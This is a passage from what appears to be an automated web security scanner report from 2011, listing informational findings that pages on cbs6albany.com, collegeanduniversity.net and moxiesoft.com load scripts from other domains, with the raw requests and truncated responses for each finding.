<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=Web Links&ghier=community%7Clinks&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.812. http://www.cbs6albany.com/sections/wrgb-talent/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/wrgb-talent/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous
http://edge.quantserve.com/quant.js

Request

GET /sections/wrgb-talent/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:23:16 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:33:16 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 26962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=custsvc&ghier=custsvc&us=anonymous"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.813. http://www.cbs6albany.com/sections/you-paid-for-it/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cbs6albany.com
Path:	/sections/you-paid-for-it/

Issue detail

The response dynamically includes the following scripts from other domains:

http://an.tacoda.net/an/15135/slf.js
http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section
http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=You Paid For It&ghier=marketplace&us=anonymous
http://common.onset.freedom.com/js/zvents-mini-base.js
http://common.onset.freedom.com/js/zvents-mini-custom.js
http://edge.quantserve.com/quant.js

Request

GET /sections/you-paid-for-it/ HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:19:23 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:29:23 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 70814

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<div id="stats"><script language="javascript" src="http://common.onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=www.cbs6albany.com&ctype=section&shier=You Paid For It&ghier=marketplace&us=anonymous"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-base.js"></script>
<script type="text/javascript" src="http://common.onset.freedom.com/js/zvents-mini-custom.js"></script>
...[SNIP]...
<div class="fi_adsense">

<script type='text/javascript' src='http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
</script><script src="http://an.tacoda.net/an/15135/slf.js" type="text/javascript"></script>
...[SNIP]...

18.814. http://www.collegeanduniversity.net/herald/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.collegeanduniversity.net
Path:	/herald/

Issue detail

The response dynamically includes the following scripts from other domains:

http://res.levexis.com/clientfiles/tmap/cunet.js
http://res.levexis.com/js/tman.js
http://www.google-analytics.com/urchin.js

Request

GET /herald/ HTTP/1.1
Host: www.collegeanduniversity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.815. http://www.moxiesoft.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/0790.js

Request

GET / HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25177

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><Title>M
...[SNIP]...


<script type="text/javascript" src="http://s3.amazonaws.com/new.cetrk.com/pages/scripts/0010/0790.js"></script>
...[SNIP]...

18.816. http://www.moxiesoft.com/solutions/cust-engagement-spaces.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/solutions/cust-engagement-spaces.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /solutions/cust-engagement-spaces.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:03:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 28945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.817. http://www.moxiesoft.com/solutions/emp-engagement-spaces.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/solutions/emp-engagement-spaces.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /solutions/emp-engagement-spaces.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:03:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 31308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<link type="text/css" media="screen" rel="stylesheet" href="/tal_products/spaces-assets/colorbox/colorbox.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.818. http://www.moxiesoft.com/tal_about/contact.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_about/contact.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js

Request

GET /tal_about/contact.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:01:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...

18.819. http://www.moxiesoft.com/tal_news/press_release.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_news/press_release.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://static.addtoany.com/menu/page.js

Request

Response

18.820. http://www.moxiesoft.com/tal_news/webinars_recorded.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_news/webinars_recorded.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

Request

GET /tal_news/webinars_recorded.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:04:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40917

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<link type="text/css" media="screen" rel="stylesheet" href="/tal_products/spaces-assets/colorbox/colorbox.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

18.821. http://www.moxiesoft.com/tal_products/answer.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/answer.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ngencim.ngenera.com/netagent/proactive/proactive.aspx

Request

GET /tal_products/answer.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:00:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 38434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...

<script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...

18.822. http://www.moxiesoft.com/tal_products/chat.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/chat.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ngencim.ngenera.com/netagent/proactive/proactive.aspx
http://www.googleadservices.com/pagead/conversion.js

Request

Response

18.823. http://www.moxiesoft.com/tal_products/cobrowse.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/cobrowse.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /tal_products/cobrowse.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39641

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.824. http://www.moxiesoft.com/tal_products/customer-spaces.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/customer-spaces.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.googleadservices.com/pagead/conversion.js

Request

GET /tal_products/customer-spaces.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40034

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.825. http://www.moxiesoft.com/tal_products/email.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/email.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ngencim.ngenera.com/netagent/proactive/proactive.aspx
http://www.googleadservices.com/pagead/conversion.js

Request

GET /tal_products/email.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 44677

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...

<script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.826. http://www.moxiesoft.com/tal_products/employee-spaces.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/employee-spaces.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://www.googleadservices.com/pagead/conversion.js

Request

GET /tal_products/employee-spaces.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39739

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<link type="text/css" media="screen" rel="stylesheet" href="spaces-assets/colorbox/colorbox.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.827. http://www.moxiesoft.com/tal_products/knowledgebase.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/knowledgebase.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ngencim.ngenera.com/netagent/proactive/proactive.aspx
http://www.googleadservices.com/pagead/conversion.js

Request

GET /tal_products/knowledgebase.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
</script><script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
...[SNIP]...

<script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

18.828. http://www.moxiesoft.com/tal_products/phone.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/phone.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ngencim.ngenera.com/netagent/proactive/proactive.aspx

Request

GET /tal_products/phone.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40433

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...

<script language="javascript" src="http://ngencim.ngenera.com/netagent/proactive/proactive.aspx"></script>
...[SNIP]...

18.829. http://www.moxiesoft.com/tal_products/proactive_chat.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moxiesoft.com
Path:	/tal_products/proactive_chat.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ngencim.ngenera.com/netagent/proactive/proactive.aspx

Request

GET /tal_products/proactive_chat.aspx HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 13:59:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 41702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

